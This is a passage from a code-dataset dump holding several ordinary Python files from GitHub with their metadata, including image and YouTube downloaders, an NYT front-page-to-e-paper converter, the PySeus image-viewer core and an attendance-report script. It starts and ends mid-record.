target_node_attributes)\n\n return neighbours_graph\n\n # neighbours_graph = nx.DiGraph()\n\n # visited = set()\n # not_visited = list()\n # not_visited.append(node)\n\n # depth = 0\n # while len(not_visited) != 0:\n # depth += 1\n # current_node = not_visited.pop(0)\n # for source, target in self.DG.edges(current_node):\n # if target not in visited:\n # not_visited.append(target)\n # neighbours_graph.add_edge(source, target)\n\n # visited.add(current_node)\n\n # if depth == neighbor_depth:\n # break\n\n # return neighbours_graph\n", "repo_name": "Muhammad-Feili/Entitology", "sub_path": "graph/topology.py", "file_name": "topology.py", "file_ext": "py", "file_size_in_byte": 2820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "graph.base.GraphBaseModule", "line_number": 5, "usage_type": "name"}, {"api_name": "networkx.Graph", "line_number": 13, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 45, "usage_type": "call"}, {"api_name": "networkx.bfs_edges", "line_number": 46, "usage_type": "call"}, {"api_name": "networkx.set_edge_attributes", "line_number": 50, "usage_type": "call"}, {"api_name": "networkx.set_node_attributes", "line_number": 55, "usage_type": "call"}, {"api_name": "networkx.set_node_attributes", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "2011577296", "text": "\nfrom tkinter import *\n\nfrom tkinter import ttk\nfrom tkinter import filedialog\n\nimport requests\n\nFolder = ''\n\ndef openLocation():\n global Folder\n\n Folder = filedialog.askdirectory()\n\n if (len(Folder)> 1):\n\n locationError.config(text=Folder,fg='green')\n\n else:\n\n locationError.config(text=\"Please Choose the File Location\",fg='red') \n\n\ndef Download():\n\n url = urlentry.get()\n\n filename = url.split('/')[-1]\n\n fold = Folder\n\n if (len(url)>1):\n urlerror.config(text=\"\")\n\n with requests.get(url, stream=True) as r:\n\n # print(\"DOWNLOADING IMAGE....!!!\")\n\n with open(fold+'/'+filename,\"wb\") as f:\n\n # print('Processing...')\n for ch in r.iter_content(chunk_size=1024):\n f.write(ch)\n\n f.close()\n urlerror.config(text=\"Download Completed!!\")\n\n else:\n\n urlerror.config(text=\"Please Enter the Url\")\n\nroot = Tk()\n\nroot.title('Image Downloader')\n\nroot.geometry('350x400')\n\nroot.columnconfigure(0,weight=1)\n\nurllab = Label(root, text=\"Enter the Url\")\n\nurllab.grid()\n\nurlentryVar = StringVar()\n\nurlentry = Entry(root,width=50, textvariable=urlentryVar)\n\nurlentry.grid()\n\n\nurlerror = Label(root, text=\"Error\", fg='red')\nurlerror.grid()\n\nsaveLabel = Label(root, text=\"Save the Image File\")\n\nsaveLabel.grid()\n\nsaveEntry = Button(root,width=10,fg='green',bg='white',text='Choose Path',command=openLocation)\nsaveEntry.grid()\n\n\nlocationError = Label(root, text=\"Error\",fg='red')\n\nlocationError.grid()\n\n\nDownloadbt = Button(root,text='Download',width=15,command=Download)\n\nDownloadbt.grid()\n\n\n\nroot.mainloop()\n\n\n\n\n", "repo_name": "pjpalaaash/Image_Downloader", "sub_path": "Image_Downloader/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1643, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tkinter.filedialog.askdirectory", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "23090562640", "text": "from pytube import YouTube\r\nfrom moviepy.video.io.ffmpeg_tools import ffmpeg_extract_audio\r\nimport os\r\n\r\n\r\n# Function to download and convert YouTube video to MP3\r\ndef download_youtube_video_as_mp3(video_url, output_directory):\r\n try:\r\n # Create a YouTube object\r\n yt = YouTube(video_url)\r\n\r\n # Get the highest resolution stream\r\n video_stream = yt.streams.get_highest_resolution()\r\n\r\n # Get the title of the YouTube video\r\n video_title = yt.title\r\n\r\n # Replace any invalid characters in the title with underscores\r\n video_title = \"\".join(x if x.isalnum() or x in [' ', '.', '-'] else '_' for x in video_title)\r\n\r\n # Download the video with the YouTube video's title as the file name\r\n video_filename = f\"{video_title}.mp4\"\r\n video_stream.download(output_path=output_directory, filename=video_filename)\r\n\r\n # Construct the paths for video and audio files\r\n video_path = os.path.join(output_directory, video_filename)\r\n mp3_filename = f\"{video_title}.mp3\"\r\n mp3_path = os.path.join(output_directory, mp3_filename)\r\n\r\n # Extract audio from the downloaded video and save it as an MP3 file\r\n ffmpeg_extract_audio(video_path, mp3_path)\r\n\r\n # Remove the downloaded video file (optional)\r\n os.remove(video_path)\r\n\r\n print(f'Video downloaded as MP3 with the YouTube title: {mp3_path}')\r\n except Exception as e:\r\n print(f'An error occurred: {str(e)}')\r\n\r\n\r\n# Get user input for the YouTube video URL and the directory\r\nvideo_url = input(\"Enter the YouTube video URL: \")\r\noutput_directory = input(\"Enter the directory where you want to save the MP3: \")\r\n\r\ndownload_youtube_video_as_mp3(video_url, output_directory)\r\n", "repo_name": "yogaraj95/YouTube_Downloader_Python", "sub_path": "YouTubeDownloader/downloader/youtube2mp3.py", "file_name": "youtube2mp3.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pytube.YouTube", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 26, "usage_type": "call"}, {"api_name": "os.path", "line_number": 26, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "moviepy.video.io.ffmpeg_tools.ffmpeg_extract_audio", "line_number": 31, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 34, "usage_type": "call"}]}
+{"seq_id": "74597034328", "text": "from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport skimage.io as iio\n\nfrom imlib.dtype import im2float\n\n\ndef imread(path, as_gray=False):\n \"\"\"Read image.\n\n Returns:\n Float64 image in [-1.0, 1.0].\n \"\"\"\n image = iio.imread(path, as_gray)\n if image.dtype == np.uint8:\n image = image / 127.5 - 1\n elif image.dtype == np.uint16:\n image = image / 32767.5 - 1\n else:\n raise Exception(\"Inavailable image dtype: %s!\" % image.dtype)\n return image\n\n\ndef imwrite(image, path):\n \"\"\"Save an [-1.0, 1.0] image.\"\"\"\n iio.imsave(path, im2float(image))\n\n\ndef imshow(image):\n \"\"\"Show a [-1.0, 1.0] image.\"\"\"\n iio.imshow(im2float(image))\n\n\nshow = iio.show\n", "repo_name": "LynnHo/Conditional-GANs-Pytorch", "sub_path": "imlib/basic.py", "file_name": "basic.py", "file_ext": "py", "file_size_in_byte": 784, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 57, "dataset": "github-code", "pt": "31", "api": [{"api_name": "skimage.io.imread", "line_number": 17, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.uint8", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.uint16", "line_number": 20, "usage_type": "attribute"}, {"api_name": "skimage.io.imsave", "line_number": 29, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 29, "usage_type": "name"}, {"api_name": "imlib.dtype.im2float", "line_number": 29, "usage_type": "call"}, {"api_name": "skimage.io.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": "skimage.io", "line_number": 34, "usage_type": "name"}, {"api_name": "imlib.dtype.im2float", "line_number": 34, "usage_type": "call"}, {"api_name": "skimage.io.show", "line_number": 37, "usage_type": "attribute"}, {"api_name": "skimage.io", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "22806918276", "text": "#!/usr/bin/python3\n\n###############################\n# 12 jan 2021\n# 2 mars 2021 \n# check request return code. pdf may not be available\n# use lighttpd , instead of OMV5 nginx. needed to use different urequests because of redirect; and error ???\n##############################\n\n\"\"\"\npip3 install pdf2image\npip3 install --user pillow\n\napt install poppler-utils\nor in anaconda powershell\nconda install -c conda-forge poppler\n\n\napt install dos2unix\n use dos2unix, unix2dos\n\"\"\"\nimport datetime\n\nx = datetime.datetime.now()\nprint(x)\n\nprint('get pdf from NTY. convert in pbm')\n\nimport sys\nprint('python executable: ' , sys.executable)\n\nimport platform\n\nif platform.node() == 'openmediavault': # running on raspberry. \n\n\t# to be copied on web server\n\tfile1 = '/home/pi/ramdisk/nyt_today.pbm'\nelse:\n\t# running on windows. will synch directly to ESP flash memory with v scode\n\tfile1 = 'src/nyt_today.pbm' \n\n\n# webserver file\n#file2 = '/var/www/openmediavault/nyt_today.pbm' # will be served as static file my my webserver\nfile2 = '/var/www/html/epaper/nyt_today.pbm' # will be served as static file my my webserver\n#image/x-portable-bitmap\n\n\n# debug. access pdf also (browser do not display pbm; just download them)\n#file3= '/var/www/openmediavault/nyt_today.pdf' # will be served as static file my my webserver\nfile3= '/var/www/html/epaper/nyt_today.pdf' # will be served as static file my my webserver\n\n\nprint('web server path for pbm' , file2)\n\nfrom PIL import Image, ImageFilter, ImageEnhance, ImageOps\n\nimport requests\nfrom datetime import date\n\n\"\"\"\n# 4.2 inch\nepd_w = 400\nepd_h = 300\n\"\"\"\n\n\"\"\"\n# v1 7.5\nepd_w = 640\nepd_h = 384\n\"\"\"\n\n\n# v2 7.5 inch\nepd_w = 800\nepd_h = 480\n\n\n\ntoday = date.today()\nd = today.strftime('%d')\nm = today.strftime('%m')\ny = today.strftime('%Y')\n\n\n################################\n# today's file. WARNING. with time difference, may not exists yet\n################################\n\nnyt = \"https://static01.nyt.com/images/\" + str(y) + '/' + str(m) + '/' + str(d) + '/nytfrontpage/scan.pdf'\nprint('url nyt:', nyt)\n\n#nyt = 'https://static01.nyt.com/images/2020/11/10/nytfrontpage/scan.pdf'\n\npdf_file = 'nyt_today.pdf'\nprint(\"get TODAY's pdf from NYT into \", pdf_file)\n\n\n\n#Make a HEAD request to a web page, and return the HTTP headers:\n#HEAD requests are done when you do not need the content of the file, but only the status_code or HTTP headers.\n#The requests.Response() Object contains the server's response to the HTTP request.\n\nh = requests.head(nyt, allow_redirects=True)\nprint('headers: ', h.headers)\nprint('content type: ', h.headers.get('Content-Type'))\n\n\nr = requests.get(nyt, allow_redirects=True)\n\nprint('get status code : ', r.status_code)\nprint('get OK : ', r.ok)\n\nprint('is redirect : ', r.is_redirect)\nprint('is permanent redirect : ', r.is_permanent_redirect)\nprint('elapsed : ', r.elapsed)\nprint('url : ', r.url)\n\nprint('type of content ', type(r.content))\n\n\nif r.ok == False:\n\tprint('request get failed. maybe the pdf is not yet available')\n\tsys.exit(1)\n\n\n# write pdf file\nopen(pdf_file, 'wb').write(r.content)\n\n#https://stackoverflow.com/questions/46184239/extract-a-page-from-a-pdf-as-a-jpeg\n#https://pypi.org/project/pdf2image/\n\nfrom pdf2image import convert_from_path, convert_from_bytes\n\n#https://www.waveshare.com/wiki/7.5inch_e-Paper_HAT\npages = convert_from_path(pdf_file, dpi=200, grayscale=True) # list of PIL images\n\n# first (and only) page\nim = pages[0]\n\n\"\"\"\nim.save('nty_today.jpg', 'JPEG')\nim.save('nty_today.pbm') # portable bit map\n\"\"\"\n\nprint('1st and only pdf page: ', im.format, im.size, im.mode) # PPM (2442, 4685) L\n# L means luminance, ie grayscale. for color RGB\n# PPM portable pixmap\n# https://en.wikipedia.org/wiki/Netpbm\n\n# crop top of image, 0 is upper left corner\n# region is defined by a 4-tuple, where coordinates are (left, upper, right, lower).\n\nprint('epaper aspect ratio ', epd_w/epd_h)\n\nW=im.size[0]\nH = W * epd_h / epd_w # would keep aspect ratio\n\n# but rather\nH=im.size[1]/2 # see more content vs keeping ratio\n\nprint('crop aspect ratio to get more content, H is org size /2 , W is org size ', W/H)\n\nbox = (0,100,W,H)\n# 100 remove top layer. trial and error\n# get top half the page of NYT pdf. 7.5 inch is still a small screen. and we get the headlines\n\ntop = im.crop(box)\n#top = ImageOps.invert(top) # otherwize, reversed on epaper\n\n#top = top.resize((epd_h, epd_w)) # portrait mode\nprint('resize to epaper, landscape mode')\ntop = top.resize((epd_w, epd_h)) # use epaper in landscape mode\ntop = top.filter(ImageFilter.DETAIL)\n\n# based on how you set up the epaper dispay\n#top = top.transpose(Image.ROTATE_180) # epaper connector on top\n\ntop.show() # will block\n\ntop = top.convert('1') # to get portable bit map P4, ie just black and white vs grayscale\nprint('pbm: ', top.format, top.size, top.mode)\n\n# either ramdisk or src\ntop.save(file1) # portable bit map\n\n# if on PI, copy to webserver\nif platform.node() == 'openmediavault':\n\n\tprint('running on raspberry, remove first 2 lines to only keep bitmap')\n\t# remove 1st two lines to only keep the real bitmap\n\t# P4 then the bitmap starts\n\n\twith open(file1, 'rb') as fp:\n\t\tfp.readline()\n\t\tfp.readline()\n\t\tbuf = fp.read()\n\n\tassert len(buf) == epd_w * epd_h // 8\n\n\tprint('len buf %d, w*h/8 %d' %(len(buf), epd_w * epd_h //8))\n\n\twith open(file1, 'wb') as fp:\n\t\tfp.write(buf)\n\n\tprint('copy pbm file to webserver ', file2)\n\tprint('copy pdf file to webserver ', file3)\n\t# copy pbm file to web server\n\t# also copy pdf to check thru browser\n\t# IP/nyt_today.pdf\n\n\t# accessing a file is OK; a directory does not work. 403 forbidden. config issue likely\n\n\tfrom shutil import copyfile\n\tcopyfile(file1, file2)\n\tcopyfile(pdf_file, file3)\n\n\"\"\"\nhex dump of PBM file Black and White\nP4 then the bitmap starts\n000000 50 34 0a 34 30 30 20 33 30 30 0a 00 00 00 00 00 P4.400 300......\n\"\"\"\n\n", "repo_name": "pabou38/NYT", "sub_path": "big.py", "file_name": "big.py", "file_ext": "py", "file_size_in_byte": 5864, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "datetime.datetime.now", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 24, "usage_type": "attribute"}, {"api_name": "sys.executable", "line_number": 30, "usage_type": "attribute"}, {"api_name": "platform.node", "line_number": 34, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 80, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 80, "usage_type": "name"}, {"api_name": "requests.head", "line_number": 104, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 109, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 124, "usage_type": "call"}, {"api_name": "pdf2image.convert_from_path", "line_number": 136, "usage_type": "call"}, {"api_name": "PIL.ImageFilter.DETAIL", "line_number": 174, "usage_type": "attribute"}, {"api_name": "PIL.ImageFilter", "line_number": 174, "usage_type": "name"}, {"api_name": "platform.node", "line_number": 188, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 215, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 216, "usage_type": "call"}]}
+{"seq_id": "37597600743", "text": "\"\"\"Main components of PySeus.\n\nClasses\n-------\n\n**PySeus** - The main application class.\n\"\"\"\n\nimport os\nimport cv2\n\nfrom PySide2.QtCore import QTimer\nfrom PySide2.QtWidgets import QApplication, QMessageBox\n\nfrom .modes import Grayscale\nfrom .formats import Raw, NumPy, H5, DICOM, NIfTI, LoadError\nfrom .settings import settings\nfrom .tools import AreaTool, LineTool\nfrom .ui import MainWindow\nfrom .ui.meta import MetaWindow\nfrom .ui.process import ProcessDialog\nfrom .settings import DataType\n\n\nclass PySeus():\n\n \"\"\"The main application class acts as front controller.\"\"\"\n\n def __init__(self, gui=True):\n\n self.qt_app = None\n \"\"\"The QApplication instance for interaction with the Qt framework.\"\"\"\n\n if isinstance(QApplication.instance(), type(None)):\n self.qt_app = QApplication([])\n else:\n self.qt_app = QApplication.instance()\n\n self.formats = [H5, DICOM, NIfTI, NumPy, Raw]\n \"\"\"List of all avaiable data formats.\n See `Formats `_.\"\"\"\n\n self.modes = [Grayscale]\n \"\"\"List of all avaiable display modes.\n See `Display `_.\"\"\"\n\n self.tools = [AreaTool, LineTool]\n \"\"\"List of all avaiable evaluation tools.\n See `Tools `_.\"\"\"\n\n self.dataset = None\n \"\"\"The current dataset object.\n See `Formats `_.\"\"\"\n\n self.dataset_processed = None\n \"\"\"The temporary processed dataset.\n \"\"\"\n\n self.mode = Grayscale()\n \"\"\"The display mode object.\n See `Display `_.\"\"\"\n\n self.tool = None\n \"\"\"The current tool object.\n See `Tools `_.\"\"\"\n\n self.window = MainWindow(self)\n \"\"\"The main window object.\n See `Interface `_.\"\"\"\n\n self.meta_window = None\n \"\"\"Holds the meta window object.\"\"\"\n\n self.process_window = None\n \"\"\"Holds the process diaglog object for denoising and reconstruction.\"\"\"\n\n self.data_type = DataType.IMAGE\n \"\"\"\"IMAGE\" or \"KSPACE\" Enum of data which is loaded from the file,\n influences GUI representation of data and file load\n dialogues\"\"\"\n\n self.slice = -1\n \"\"\"Index of the current slice.\"\"\"\n\n self.timer = QTimer()\n \"\"\"Timer for cine view.\"\"\"\n\n self.gui = gui\n \"\"\"Flag wheter to use the GUI or not.\"\"\"\n\n # Stylesheet\n style_path = \"./ui/\" + settings[\"ui\"][\"style\"] + \".qss\"\n style_path = os.path.join(os.path.dirname(__file__), style_path)\n with open(style_path, \"r\") as stylesheet:\n self.qt_app.setStyleSheet(stylesheet.read())\n\n self.qt_app.font().setPixelSize(int(settings[\"ui\"][\"font_size\"]))\n\n if self.gui:\n self.window.show()\n\n def show(self):\n \"\"\"Show the main window, even if initialized without the GUI.\"\"\"\n if not self.gui:\n self.window.show()\n self.gui = True\n\n self.qt_app.exec_()\n\n def load_file(self, path, data_type=DataType.IMAGE):\n \"\"\"Try to load the file at *path*. See also *setup_dataset*.\"\"\"\n self.data_type = data_type\n self.mode.set_source(self.data_type)\n\n new_dataset = None\n for format_ in self.formats:\n if format_.can_handle(path):\n new_dataset = format_()\n break\n\n if new_dataset is not None:\n self.setup_dataset(path, new_dataset)\n\n else:\n QMessageBox.warning(self.window, \"Pyseus\", \"Unknown file format.\")\n\n def load_data(self, data, data_type=DataType.IMAGE):\n \"\"\"Try to load *data*. See also *setup_dataset*.\"\"\"\n self.data_type = data_type\n self.mode.set_source(self.data_type)\n\n new_dataset = Raw()\n self.setup_dataset(data, new_dataset)\n\n def setup_dataset(self, arg, dataset=None):\n \"\"\"Setup a new dataset: Load scan list, generate thumbnails and load\n default scan.\"\"\"\n if dataset is None:\n dataset = self.dataset\n\n try:\n if not dataset.load(arg, self.data_type): # canceled by user\n return\n\n self.clear()\n self.dataset = dataset\n\n if self.dataset.scan_count() > 1:\n message = \"{} scans detected. Do you want to load all?\" \\\n .format(self.dataset.scan_count())\n load_all = QMessageBox.question(None, \"Pyseus\", message)\n\n self.window.thumbs.clear()\n if load_all is QMessageBox.StandardButton.Yes:\n for scan_id in range(0, self.dataset.scan_count()):\n thumb = self.mode.generate_thumb(\n self.dataset.get_scan_thumbnail(scan_id),\n int(settings[\"ui\"][\"thumb_size\"]))\n pixmap = self.mode.get_pixmap(thumb)\n self.window.thumbs.add_thumb(pixmap)\n else:\n single_scan = self.dataset.scans[self.dataset.scan]\n self.dataset.scans = [single_scan]\n self.dataset.scan = 0\n\n self.load_scan()\n\n except LoadError as error:\n QMessageBox.warning(self.window, \"Pyseus\", str(error))\n\n except OSError as error:\n QMessageBox.warning(self.window, \"Pyseus\", str(error))\n\n else:\n self.window.info.update_path(self.dataset.path)\n\n def refresh(self):\n \"\"\"Refresh the displayed image.\"\"\"\n if self.slice == -1:\n return\n data = self.dataset.get_pixeldata(self.slice)\n # @TODO move to FormatBase (get_pixeldata_adjusted)\n spacing = self.dataset.get_spacing()\n if spacing[0] != spacing[1]:\n if spacing[0] > spacing[1]:\n size = (int(data.shape[0] * spacing[0] / spacing[1]),\n int(data.shape[1]))\n else:\n size = (int(data.shape[0]),\n int(data.shape[1] * spacing[1] / spacing[0]))\n data = cv2.resize(data, size)\n\n pixmap = self.mode.get_pixmap(data)\n\n if self.tool is not None:\n pixmap = self.tool.draw_overlay(pixmap)\n\n self.window.view.set(pixmap)\n\n def recalculate(self):\n \"\"\"Refresh the active evaluation tool.\"\"\"\n if self.tool is not None:\n slice_ = self.dataset.get_pixeldata(self.slice)\n self.tool.recalculate(\n self.mode.prepare_raw(slice_))\n\n def select_scan(self, sid, relative=False):\n \"\"\"Select and load a scan from the current dataset.\n See also *load_scan*.\"\"\"\n if self.dataset is None:\n return\n\n new_scan = self.dataset.scan + sid if relative is True else sid\n if 0 <= new_scan < self.dataset.scan_count():\n self.clear_tool()\n self.load_scan(new_scan)\n\n def load_scan(self, sid=None):\n \"\"\"Load a scan from the current dataset.\"\"\"\n old_sid = self.dataset.scan\n\n if sid is None:\n sid = self.dataset.scan\n self.dataset.load_scan(sid)\n\n if self.slice >= self.dataset.slice_count() or self.slice == -1:\n self._set_slice(self.dataset.slice_count() // 2)\n\n if self.dataset.scan_count() > 1:\n old_thumb = self.window.thumbs.thumbs[old_sid]\n new_thumb = self.window.thumbs.thumbs[sid]\n old_thumb.setStyleSheet(\"border: 1px solid transparent\")\n new_thumb.setStyleSheet(\"border: 1px solid #aaa\")\n\n default_metadata = self.dataset.get_metadata(\"DEFAULT\")\n self.window.meta.update_meta(default_metadata,\n len(default_metadata) > 0)\n self.window.info.update_scan(self.dataset.scans[sid])\n\n self.mode.setup_window(self.dataset.get_pixeldata())\n self.refresh()\n self.window.view.zoom_fit()\n\n def select_slice(self, sid, relative=False):\n \"\"\"Select and display a slice from the current scan.\"\"\"\n if self.dataset is None:\n return\n\n new_slice = self.slice + sid if relative is True else sid\n if 0 <= new_slice < self.dataset.slice_count():\n self._set_slice(new_slice)\n self.refresh()\n self.recalculate()\n\n def _set_slice(self, sid):\n \"\"\"Set the current slice index.\"\"\"\n self.window.info.update_slice(sid, self.dataset.slice_count())\n self.slice = sid\n\n def get_slice_id(self):\n return self.slice\n\n def show_metadata_window(self):\n \"\"\"Show the metadata window.\n See `Interface `_.\"\"\"\n self.meta_window = MetaWindow(self, self.dataset.get_metadata())\n self.meta_window.show()\n\n def show_process_window(self, proc_type):\n \"\"\"Show the process window.\"\"\"\n self.process_window = ProcessDialog(self, proc_type)\n self.process_window.show()\n\n def set_processed_dataset(self, dataset):\n \"\"\"Save processed data in Dataset after confirmation in ProcessDialog.\"\"\"\n\n if self.data_type == DataType.IMAGE:\n\n self.load_data(dataset, DataType.IMAGE)\n\n elif self.data_type == DataType.KSPACE:\n\n self.load_data(dataset, DataType.IMAGE)\n\n self.refresh()\n self.window.view.zoom_fit()\n\n def clear(self):\n \"\"\"Reset the application.\"\"\"\n self.dataset = None\n self.slice = -1\n self.window.view.set(None)\n self.window.thumbs.clear()\n self.clear_tool()\n\n def clear_tool(self):\n \"\"\"Reset the active evaluation tool.\"\"\"\n if self.tool is not None:\n self.tool.clear()\n\n def rotate(self, axis):\n \"\"\"Rotate the pixeldata of the current scan in 3D.\"\"\"\n self.dataset.rotate(axis)\n if not axis == 2:\n self._set_slice(self.dataset.slice_count() // 2)\n\n self.refresh()\n self.window.view.zoom_fit()\n self.clear_tool()\n\n def flip(self, direction):\n \"\"\"Flip the pixeldata of the current scan.\"\"\"\n self.dataset.flip(direction)\n\n self.refresh()\n self.clear_tool()\n\n def toggle_cine(self):\n \"\"\"Toggle automatic loading of next scans.\"\"\"\n if self.timer.isActive():\n self.timer.stop()\n else:\n self.timer.timeout.connect(self._cine_next)\n self.timer.start(int(settings[\"cine\"][\"interval\"]))\n\n def _cine_next(self):\n self.select_scan(1, True)\n", "repo_name": "IMTtugraz/PySeus", "sub_path": "pyseus/core.py", "file_name": "core.py", "file_ext": "py", "file_size_in_byte": 10502, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PySide2.QtWidgets.QApplication.instance", "line_number": 34, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 34, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 35, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication.instance", "line_number": 37, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QApplication", "line_number": 37, "usage_type": "name"}, {"api_name": "formats.H5", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.DICOM", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.NIfTI", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.NumPy", "line_number": 39, "usage_type": "name"}, {"api_name": "formats.Raw", "line_number": 39, "usage_type": "name"}, {"api_name": "modes.Grayscale", "line_number": 43, "usage_type": "name"}, {"api_name": "tools.AreaTool", "line_number": 47, "usage_type": "name"}, {"api_name": "tools.LineTool", "line_number": 47, "usage_type": "name"}, {"api_name": "modes.Grayscale", "line_number": 59, "usage_type": "call"}, {"api_name": "ui.MainWindow", "line_number": 67, "usage_type": "call"}, {"api_name": "settings.DataType.IMAGE", "line_number": 77, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 77, "usage_type": "name"}, {"api_name": "PySide2.QtCore.QTimer", "line_number": 85, "usage_type": "call"}, {"api_name": "settings.settings", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 93, "usage_type": "call"}, {"api_name": "os.path", "line_number": 93, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 93, "usage_type": "call"}, {"api_name": "settings.settings", "line_number": 97, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 110, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 110, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.warning", "line_number": 125, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 125, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 127, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 127, "usage_type": "name"}, {"api_name": "formats.Raw", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox.question", "line_number": 151, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 151, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.StandardButton", "line_number": 154, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 154, "usage_type": "name"}, {"api_name": "settings.settings", "line_number": 158, "usage_type": "name"}, {"api_name": "formats.LoadError", "line_number": 168, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.warning", "line_number": 169, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 169, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QMessageBox.warning", "line_number": 172, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets.QMessageBox", "line_number": 172, "usage_type": "name"}, {"api_name": "cv2.resize", "line_number": 191, "usage_type": "call"}, {"api_name": "ui.meta.MetaWindow", "line_number": 266, "usage_type": "call"}, {"api_name": "ui.process.ProcessDialog", "line_number": 271, "usage_type": "call"}, {"api_name": "settings.DataType.IMAGE", "line_number": 277, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 277, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 279, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 279, "usage_type": "name"}, {"api_name": "settings.DataType.KSPACE", "line_number": 281, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 281, "usage_type": "name"}, {"api_name": "settings.DataType.IMAGE", "line_number": 283, "usage_type": "attribute"}, {"api_name": "settings.DataType", "line_number": 283, "usage_type": "name"}, {"api_name": "settings.settings", "line_number": 324, "usage_type": "name"}]}
+{"seq_id": "36436013102", "text": "import pandas as pd\r\nimport datetime\r\nimport time\r\nimport os\r\nimport pickle\r\nimport shutil\r\n\r\n# import matplotlib.pyplot as plt\r\n\r\ndef get_today_att_percentage():\r\n ts = time.time()\r\n date = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d')\r\n csv_file_path = './Data/reports/'+date+'.csv'\r\n pickle_file_path = './Data/encodings/face_names.pkl'\r\n x = int()\r\n y = int() \r\n if checkfile(csv_file_path):\r\n if checkfile(pickle_file_path):\r\n x = get_total_students(pickle_file_path)\r\n y = get_total_col(csv_file_path)\r\n return (y/x)*100\r\n else:\r\n print(\"There are no students registered \")\r\n else:\r\n print(\"Today's attendance not taken yet\")\r\n\r\n\r\ndef get_total_students(pickle_file_path): \r\n with open(pickle_file_path, \"rb\") as f:\r\n face_names = pickle.load(f)\r\n known_face_names = face_names\r\n return len(known_face_names)\r\n \r\ndef get_total_col(csv_path):\r\n df = pd.read_csv(csv_path)\r\n return len(df)\r\n\r\n\r\n\r\n\r\n#return as list contain attendace taken dates\r\ndef get_all_att_reports_list():\r\n reports_list = []\r\n directory = './Data/reports'\r\n for filename in os.listdir(directory):\r\n if filename.endswith(\".csv\"):\r\n reports_list.append(filename)\r\n return reports_list\r\n\r\n\r\n#checks whether the given file is present or not\r\ndef checkfile(file_path):\r\n if(os.path.isfile(file_path)):\r\n return True\r\n else:\r\n return False\r\n\r\n#get all repots to desktop #NOTEEEEEEEEEE ::: USE SHUTIL.copytree\r\ndef get_all_reports_desktop():\r\n desktop_path = os.path.expanduser(\"~\\\\Desktop\")\r\n desktop_path = desktop_path + '\\\\FRAS_ALL_REPORTS'\r\n if os.path.isdir(desktop_path): \r\n shutil.rmtree(desktop_path)\r\n\r\n os.mkdir(desktop_path)\r\n for file_name in get_all_att_reports_list():\r\n shutil.copy2('./Data/reports/'+file_name, desktop_path)\r\n return 1\r\n\r\n\r\n\r\ndef get_all_reports_avg():\r\n percentage_list = []\r\n x= 0\r\n for date in get_all_att_reports_list():\r\n date = 